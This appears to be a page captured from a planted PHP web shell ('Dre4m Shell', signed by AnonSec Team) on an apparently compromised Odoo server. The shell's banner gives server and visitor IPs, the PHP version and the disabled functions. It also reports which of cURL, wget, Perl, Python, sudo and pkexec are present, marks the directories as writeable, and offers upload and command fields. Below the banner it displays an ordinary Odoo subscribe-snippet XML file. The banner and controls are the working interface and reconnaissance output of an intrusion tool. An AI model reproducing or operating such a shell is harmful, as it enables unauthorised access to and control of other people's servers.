Dre4m Shell
Server IP : 127.0.0.2  /  Your IP : 18.189.188.228
Web Server : Apache/2.4.18 (Ubuntu)
System :
User : www-data ( )
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : disk_free_space,disk_total_space,diskfreespace,dl,exec,fpaththru,getmyuid,getmypid,highlight_file,ignore_user_abord,leak,listen,link,opcache_get_configuration,opcache_get_status,passthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,php_uname,phpinfo,posix_ctermid,posix_getcwd,posix_getegid,posix_geteuid,posix_getgid,posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid,posix,_getppid,posix_getpwnam,posix_getpwuid,posix_getrlimit,posix_getsid,posix_getuid,posix_isatty,posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid,posix_setpgid,posix_setsid,posix_setuid,posix_times,posix_ttyname,posix_uname,pclose,popen,proc_open,proc_close,proc_get_status,proc_nice,proc_terminate,shell_exec,source,show_source,system,virtual
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /opt/odoo/addons/website_mail_channel/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /opt/odoo/addons/website_mail_channel/views/snippets.xml
<?xml version="1.0" encoding="utf-8"?>
<odoo>

<template id="subscribe" inherit_id="website.snippets" name="Snippet Subscribe">

    <xpath expr="//div[@id='snippet_content']/div[@class='o_panel_body']" position="inside">
        <div>
            <div class="oe_snippet_thumbnail">
                <img class="oe_snippet_thumbnail_img" src="/website_mail_channel/static/src/img/blocks/button_channel_subscribe.png"/>
                <span class="oe_snippet_thumbnail_title">Discussion Group</span>
            </div>

            <div class="oe_snippet_body js_follow_alias"
                      data-id="0"
                      data-object="mail.channel"
                      data-follow="off">
                <div class="input-group js_mg_follow_form">
                    <input
                          type="email"
                          name="email"
                          class="js_follow_email form-control"
                          placeholder="your email..."/>
                    <span class="input-group-btn">
                        <button href="#" class="btn btn-primary js_follow_btn">Subscribe</button>
                    </span>
                </div>
                <p class="js_mg_details hidden well well-sm">
                    <span class="js_mg_email hidden"><i class="fa fa-envelope-o"/><a href="#" class="js_mg_email"> send mail</a> - </span>
                    <i class="fa fa-file-o"/><a href="#" class="js_mg_link"> archives</a> -
                    <i class="fa fa-times"/><a href="#" class="js_unfollow_btn"> unsubscribe</a>
                </p>
                <p class="js_mg_confirmation hidden well well-sm">
                    a confirmation email has been sent.
                </p>

            </div>

        </div>
    </xpath>


    <xpath expr="//div[@id='snippet_options']" position="inside">
        <div data-js='subscribe'
            data-selector=".js_follow_alias"
            data-drop-near="p, h1, h2, h3, blockquote, .well, .panel"
           >
            <li data-select_mailing_list=""><a>Change Discussion List</a></li>
        </div>
    </xpath>

</template>
</odoo>

Anon7 - 2022
AnonSec Team